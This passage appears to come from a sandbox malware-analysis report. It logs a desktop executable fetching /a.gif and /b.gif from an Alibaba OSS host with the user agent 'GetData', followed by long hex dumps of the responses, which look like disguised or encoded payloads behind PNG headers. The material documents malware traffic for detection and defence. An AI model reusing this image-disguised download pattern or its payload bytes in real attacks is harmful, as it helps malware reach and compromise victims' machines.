                                  x-oss-server-time: 17
                                  2025-01-11 03:35:27 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 06 06 02 58 3e 3f 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 50 50 54 0e 68 69 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 05 05 01 5b 3d 3c 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 51 51 55 0f 69 68 21
                                  Data Ascii: l%00X>?v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffPPThi aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[=<u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rggQQUih!


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.44992639.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:28 UTC111OUTGET /a.gif HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:29 UTC545INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:28 GMT
                                  Content-Type: image/gif
                                  Content-Length: 135589
                                  Connection: close
                                  x-oss-request-id: 6781E7001F7AD93131AED2A5
                                  Accept-Ranges: bytes
                                  ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                  Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 8642451798640735006
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000104
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                  x-oss-server-time: 5
                                  2025-01-11 03:35:29 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                  2025-01-11 03:35:29 UTC4096INData Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87
                                  Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                  2025-01-11 03:35:29 UTC4096INData Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92
                                  Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                  2025-01-11 03:35:29 UTC4096INData Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea
                                  Data Ascii: c}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                  2025-01-11 03:35:29 UTC4096INData Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55
                                  Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
                                  2025-01-11 03:35:29 UTC4096INData Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92
                                  Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                  2025-01-11 03:35:29 UTC4096INData Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17
                                  Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                  2025-01-11 03:35:29 UTC4096INData Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58
                                  Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
                                  2025-01-11 03:35:29 UTC4096INData Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52
                                  Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJLR
                                  2025-01-11 03:35:29 UTC4096INData Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19
                                  Data Ascii: WUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.44994139.103.20.1054437276C:\Users\user\Desktop\2976587-987347589.07.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-11 03:35:30 UTC111OUTGET /b.gif HTTP/1.1
                                  User-Agent: GetData
                                  Host: 662hfg.oss-cn-beijing.aliyuncs.com
                                  Cache-Control: no-cache
                                  2025-01-11 03:35:31 UTC548INHTTP/1.1 200 OK
                                  Server: AliyunOSS
                                  Date: Sat, 11 Jan 2025 03:35:30 GMT
                                  Content-Type: image/gif
                                  Content-Length: 125333
                                  Connection: close
                                  x-oss-request-id: 6781E7029DBA123538DC7490
                                  Accept-Ranges: bytes
                                  ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                  Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT
                                  x-oss-object-type: Normal
                                  x-oss-hash-crc64ecma: 10333201072197591521
                                  x-oss-storage-class: Standard
                                  x-oss-ec: 0048-00000104
                                  Content-Disposition: attachment
                                  x-oss-force-download: true
                                  Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                  x-oss-server-time: 133
                                  2025-01-11 03:35:31 UTC3548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                  Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                  2025-01-11 03:35:31 UTC4096INData Raw: 5d 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7
                                  Data Ascii: ]^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                  2025-01-11 03:35:31 UTC4096INData Raw: 79 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab
                                  Data Ascii: ymmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                  2025-01-11 03:35:31 UTC4096INData Raw: 1c c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67
                                  Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                  2025-01-11 03:35:31 UTC4096INData Raw: d8 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02
                                  Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                  2025-01-11 03:35:31 UTC4096INData Raw: 59 de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb
                                  Data Ascii: YImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                  2025-01-11 03:35:31 UTC4096INData Raw: d8 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04
                                  Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
